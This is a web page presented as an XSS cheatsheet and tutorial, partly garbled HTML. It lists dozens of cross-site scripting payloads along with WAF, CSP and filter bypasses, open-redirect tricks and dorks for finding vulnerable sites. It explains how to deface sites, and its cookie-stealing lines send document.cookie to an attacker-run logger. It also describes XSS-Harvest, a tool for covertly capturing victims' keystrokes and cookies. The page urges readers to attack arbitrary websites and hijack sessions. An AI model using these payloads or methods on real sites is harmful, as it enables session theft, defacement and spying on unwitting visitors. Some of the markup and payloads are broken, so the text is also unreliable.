Cross-Site Scripting (XSS) Cheatsheet/Payloads And Tutorial 2025

‘XSS’ is also known as ‘CSS’ – Cross Site Scripting.

What is Cross Site Scripting (XSS)?
How to Find XSS Vulnerabilities?
How to Bypass XSS Filtration?
Update XSS Payloads
Nice CSP and WAF Bypass Payload
XSS- Harvest
New:- Advance Scripts To Find XSS Vulnerabilities In Websites.

Also See: New XSS Payloads [Update]

[UPDATE]

#BugBounty Tip

Google Dork – all the IMP extensions

Found XSS via tr iple URL encode

“>
but 3 times encode above code could worked

final paylaod:
%2522%253E%253CsVg%252FOnLuFy%253D%2522X%253Dy%2522oNloaD%253D%253B1%255Econfirm%25281%2529%253E

Lookhere Payload

Payload: lookhere’);});

1) Here “lookhere” was used to detect all the places the input was reflected.
2) The rest is responsible for balancing the payload.

Bypass Open Redirect

target[.]com/?redirect_to=evil[.]com => Warning Site

Bypass just character capital O

target[.]com/?redirect_to=evil[.]cOm => redirect to evil[.]com

Bypass rXSS

Target[.]com/?s=”> -> No result

Copy and paste same parameter 2 times

Target[.]com/?s=">&s=">

Output : alert(1)

If browser is ignoring Javascript code then move to access key Payload.

"accesskey="x"onclick="alert(document.domain)"//

To Test SQLi + XSS + SSTI using following Payload

'">

Find XSS Vulnerability through utm_source parameter.

Try following Payloads

/?utm_source=%60%2balert/**/(1)%2b%60

/?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e

Explanation

The utm_source parameter is not escaped properly for URL encoded values. We can escape at multiple locations in the source. I escaped in the script section. The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag. Basically we can dissect it as follows:

abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e

is url encoded for

abc`;return+false});});alert`xss`;

Payload explaination

abc`; Finish the string
return+false}); Finish the jQuery click function
}); Finish the jQuery ready function
alert`xss`; Here we can execute our code
This closes the script tag to prevent JavaScript parsing errors

What is XSS?

It is a very common vulnerability found in Web Applications, Cross Site Scripting (XSS) allows the attacker to INSERT malicious code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an “attacker” to inject some code into the applications affected in order to bypass access to the website or to apply “phishing” on falls users.

This technique is also used for website Hacking.

Types of XSS:

There are actually three types of Cross-Site Scripting, commonly named as:

DOM-Based XSS
Non-persistent XSS
Persistent XSS

DOM-Based : The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes “since born” some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.

The DOM-Based XSS exploits these problems on users local machines in this way:

– The attacker creates a well built malicious website
– The ingenious user opens that site
– The user has a vulnerable page on his machine
– The attacker’s website sends commands to the vulnerable HTML page
– The vulnerable local page execute that commands with the user’s privileges on that machine.
– The attacker easily gain control on the victim computer.

Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It’s commonly named as “non-persistent” because it works on an immediate HTTP response from the victim website: it show up when the web page get the data provided by the attacker’s client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.

Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users information and the difference is that in websites vulnerable to Persistent XSS the attacker doesn’t need to provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of “guestbooks”.

Usually the users uses that kind of tool to leave messages to the owner of the website and at a first look it doesn’t seems something dangerous, but if an attacker discover that the system is vulnerable can insert some malicious code in his message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn’t do any check on the content of the inserted message: it just inserts the data provided from the user into the result page.

Also See : CSRF Exploitation Using Stored XSS Vulnerability – Working

How to Find Cross Site Scripting (XSS) Vulnerabilities:-

To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s, there are too many to mention.

Using ‘Google Dorks’ to make the finding easier, Ok if you wanna get cracking, go to google.com and type inurl:"search.php?q=" now that is a common page and has a lot of results. Also note that most sites have XSS Vulnerabilities, it’s just having a good eye, and some good knowledge on how to bypass their filtration.

HOCXSS Automatic Cross Site Scripting XSS Vulnerability Scanner

Features:

Persistence, Non-persistence and Dom based scanning
It can scan target anonymously using TOR
Multi-threaded crawling
WAF detection & evasion
HOC updated payload
WAF BYPASS payloads
Complete HTTP support
Brute force payloads from a file
Auto-detect method GET/POST
Set cookie

Download HOCXSS

Basics of XSS:

Well now let’s start learning some Actual Methods, the most common used XSS injection is :

now this will alert a popup message, saying “Priyanshu” without quotes.

So, use "search.php?q=" and you can simply try the following on a website with the same thing,

http://website.com/search.php?q=

There are good chances of it working, but don’t be worried if it don’t, just try different sites. You can insert HTML not just javascript.

http://website.com/search.php?q= Priyanshu

If you see the bold text on the page and newlines then you knows it’s vulnerable.

How to Deface a Website using XSS ?

Well now you understand how XSS works, we can explain some simple XSS deface methods, there are many ways for defacing I will mention some of the best and most used, the first one being IMG SCR, now for those of you who don’t know HTML, IMG SCR is a tag, that displays the IMAGE linked to it on the web page.

ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.

The other tags are not needed has the page will already have them. Ok it helps to make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.


That will execute the flash video linked to it. Or maybe using a pop or redirection as :

There are many others ways that you can found using Google or other website.

My purpose is to make you understand the concept 🙂
How to Cookie Stealing using XSS ?
I decided to add this has its the most useful method of XSS. First learn how to make cookie logger from here:
How To Make A Cookie Stealer Php script ?
ok now you have it save it has a .php file and upload to your server, remember to create the file ‘log.txt’ too

and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.
ok now your gonna want to insert this code.
window.location="http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location="http://yourServer.com/cookielogger.php?c="+document.cookie
now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen.

the second one is more stealth. Watch your file now for cookies, then you can hijack their session 😀
but now you ask what if my site has not got, this kind of attack, it only shows data once and don’t store it. Well let’s say we had a page search.php?q= we can use the following code to make a malicious url from it and maybe hex, base64 encode it so people can’t see the code
http://site.com/search.php?q=document.location="http://yourServer.com/cookielogger.php?c="+document.cookie

How to Bypass Filtration ?
A lot of sites may seem vulnerable but not executing the code, well to solve this read this. Some common methods to bypass filtration is
')alert('xss');

or

");alert('xss');
That will do the same thing as  on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit, Please note its bad practice to use alert(“XSS”) to test for XSS, because some sites block the keyword “XSS” before so we using “Priyanshu”.
Some other ways to bypass filtration | example of cross site scripting
website.com/search.php?q=">

website.com/search.php?q=">

website.com/search.php?q=">

website.com/search.php?q=">

website.com/search.php?q=//">

website.com/search.php?q=xyz

website.com/search.php?q=xyz">

website.com/search.php?q=xyz">

website.com/search.php?q=000">

website.com/search.php?q=000xyz

website.com/search.php?q=--alert(/Priyanshu/);

website.com/search.php?q=">

website.com/search.php?q=">

New XSS Payloads [Update]

JavaScript://%250Aalert?.(document.domain)//

'">
java%26Tab%3bscript:ale%26Tab%3brt()
cript>alert()</s<script>cript></span></pre>
<p><strong>Payload:</strong></p>
<p><b>Javascript XSS Payloads</b></p>
<pre><strong>lookhere’);}</script><img src=x onerror=alert(“XSS”)></strong></pre>
<ol>
<li>Here Keyword “lookhere” to detect all the place the input could reflected</li>
<li>Other codes are responsible for balancing the payload.</li>
</ol>
<pre style="text-align: justify;"><a href="javascript:alert(1)'>XSS</a>

1"-top["con\x66irm"](document.domain)-"

javascript: //% 250Alert (document.location = document.cookie)

'-prompt.call(window, 'xss')-'

'-alert.call(window, 'xss')-'

<\/script><script>alert('XSS')<\/script>
aaa"bbb'ccc<svg onload=alert('XSS')>eee

<svg onload="alert('XSS on '+ document.domain)">

</title></script/"-alert( 0)-"--><img/onerror='; alert(/XSS/);'src=1>

</title></script/"-alert(0)-"-->"><svg/ onload=prompt(/XSS/)>

<script>alert(1);//

"'> </form><script>alert("XSS");</script>

'> </form><script>alert("XSS");</script>

javascript://%0a%0dalert(document.cookie)

*/alert('XSS\n-XSS'); //

''> </form><script>alert("XSS");</script>

'"><ScRiPt >prompt(/XSS/)</ScRiPt>

'"> <ScRiPt >prompt(/XSS/)</ScRiPt>

data:,\u0077indow.top.alert(1)

https://play.spotify.com/legal/?fwdurl=

"><svg onload="alert(domain)

"-alert(document.domain)-"

</script/x><scr<script>ipt>alert(1)</script/x>

onmouseover=alert'(document.domain)'

/<marquee loop=1 width=0 onfinish=alert(1)>

</TITLE><sCRipT>alert ("XSS");</sCRipT><TITLE></pre>
<p style="text-align: justify;"><code>text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</code></p>
<p style="text-align: justify;"><code><base href="javascript:\"> <a href="//%0aalert(/1/);//">link</a></code></p>
<p style="text-align: justify;"><code>javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'></code></p>
<h3 style="text-align: justify;"><strong>Nice CSP and WAF Bypass Payload</strong></h3>
<pre><svg>/OnLoad="`${prompt"}`"></pre>
<pre><--`<img/src=`%20onerror=confirm``>%20--!></pre>
<p style="text-align: justify;"><code><meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh></code></p>
<p style="text-align: justify;"><code><svg </onload ="1> (_=alert,_(1337)) ""></code></p>
<p style="text-align: justify;"><code><img onerror=alert(1) src <u></u></code></p>
<hr />
<h2 style="text-align: justify;"><span style="text-decoration: underline;"><strong>XSS-Harvest:-</strong></span></h2>
<p style="text-align: justify;"><strong>Harvesting Cross Site Scripting, Clicks, Keystrokes and Cookies</strong></p>
<p style="text-align: justify;">Even today many of us still do not understand the impact of an exploited XSS vulnerability, and I include the security community in this statement. To summarise, a successfully exploited XSS vulnerability will allow the interception of ALL keystrokes, ALL mouse actions, ALL cookies (unless protected by scope) on ALL pages of the affect domain, regardless of whether or not the vulnerability is “reflected” or “persistent”.XSS-Harvest is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool.</p>
<p style="text-align: justify;"><strong>Functionality of XSS-harvest:</strong></p>
<ul>
<li style="text-align: justify;">Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.</li>
<li style="text-align: justify;">Any key entered will be sent covertly to the server.<br />
Any mouse click performed will be analysed and the data covertly sent to the server.</li>
<li style="text-align: justify;">Optionally ‘redress’ the vulnerable page to display a different page on the same subdomain – e.g. a login form.</li>
<li style="text-align: justify;">If redressing the victim’s browser, allow subsequently loaded pages to be also ‘infected’ – assuming they don’t break the same-origin policy (i.e. they’re on the same subdomain).</li>
<li style="text-align: justify;">Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).</li>
<li style="text-align: justify;">Each victim has a separate history file containing all events, cookies and keystrokes.</li>
<li style="text-align: justify;">Server console displays real-time data received (due to multi-threaded nature, keystrokes are displayed as ‘.’ characters to avoid confusion).</li>
<li style="text-align: justify;">Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.</li>
<li style="text-align: justify;">Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.</li>
</ul>
<p style="text-align: justify;"><strong>How to Exploit XSS with XSS-Harvest?</strong></p>
<p style="text-align: justify;">Identify a page vulnerable to XSS (reflected or persistent will be fine – unless the victim is running IE9 or another plugin such as NoScript).</p>
<p style="text-align: justify;">Understand the markup of the page. You should be looking to insert syntactically correct <script></script> tags in to the source of the vulnerable page. Most attackers will insert something like ‘<script>alert(1)</script>’ at this stage to ensure the page is actually vulnerable.</p>
<p style="text-align: justify;">Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.</p>
<p style="text-align: justify;">Insert the following ‘injection string’ into the vulnerable page:</p>
<p style="text-align: justify;"><code><script src=”></code></p>
<p style="text-align: justify;">This will return the client-side JavaScript to the victim, indicated by the ‘i’ in the URL.<br />
Entice visitors to the infected page (or to follow a link in the case of reflected XSS).<br />
Watch your victims roll in – a new history file will be created for each new victim.<br />
To use of the redress function, start the server with the -r parameter:</p>
<p style="text-align: justify;">./xss-harvest.pl -l -r http://vulnerablepage.local/login.html</p>
<p style="text-align: justify;"><strong>Basic dependencies:</strong><br />
HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std, Net::Server::PreFork</p>
<p style="text-align: justify;"><a href="https://github.com/Miserlou/XSS-Harvest" target="_blank" rel="nofollow noopener noreferrer">Download XSS-Harvest</a></p>
<hr />
<h3 style="text-align: justify;"><span style="text-decoration: underline;"><strong>–> New:- Advance Scripts To Find XSS Vulnerabilities In Websites.</strong></span></h3>
<p><strong>CloudFlare Bypass</strong></p>
<pre><Img+Src=OnXSS+OnError=alert(1)></pre>
<p><strong>HTML Injection</strong></p>
<pre><a href="link_here">name</a></pre>
<div style="text-align: justify;">Just Copy any script and try..</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"><b>To Redirect exploit code:</b></div>
<div style="text-align: justify;">
<p><b></b><code>';redirecturl='javascript:alert("XSS")</code><br />
<b></b><code>';redirecturl='http://google.com/'</code></p>
<pre>redirect_to=////evil%E3%80%82com</pre>
<p><b>New for XSS </b></p>
</div>
<div style="text-align: justify;">Example of cross site scripting – <code>www.xyz.com?q="XSS Script"</code></div>
<div style="text-align: justify;">
<ul>
<li><code>"/>alert("Xss:Priyanshu")</code></li>
<li><code>"/></script><script>alert(/XSS : Priyanshu/)</script></code></li>
</ul>
<p><code><body onload=alert(1)></code><br />
<code>"<body onload="alert('XSS by Priyanshu')"></code></p>
<p><code>"><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript></code></p>
<p><code><body onload=document.getElementById("xsrf").submit()></code></p>
<p><code><a href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(1)>">X</a</code></p>
<p><code><a href="data:text/html;based64_,<svg/onload=\u0061&#x6c;&101%72t(document.cookie)>">X</a</code></p>
<ul>
<li><code>http://test.com<script>alert(document.domain)</script></code></li>
<li><code>http://test.com<script>alert(document.cookie)</script></code></li>
</ul>
<p><code><img src=x onerror=alert(document.domain)></code></p>
<p><code>x"></script><img src=x onerror=alert(1)></code></p>
<p><code>q=" onclick="alert(/XSS/)</code></p>
<p><code>"><iframe src='javascript:prompt(/XSS/);'></code></p>
<p><code><iframe src="https://google.com">
"></p>
<p><code></script><script>alert(document.cookie)</script></code></p>
<p><code><xss>alert('xss')</xss></code></p>
<p><code><iframe src="https://google.com">
DOM Based XSS Scripts

/default.aspx#">
/default.aspx#">

 by ">
“>.txt.jpg
“>
">
">
id=abc">
">
Default.aspx/" onmouseout="confirm(1)'x="

The Latest

Udemy Data Breach – 1.4 Million Records Leaked by ShinyHunters

7 Best AI Red Teaming Platforms For 2026

The Hidden Threat: How Third-Party Vulnerabilities Affect Platforms Like OpenAI

Google Uncovers “DarkSword”: Advance iOS Exploit Chain Targeting Users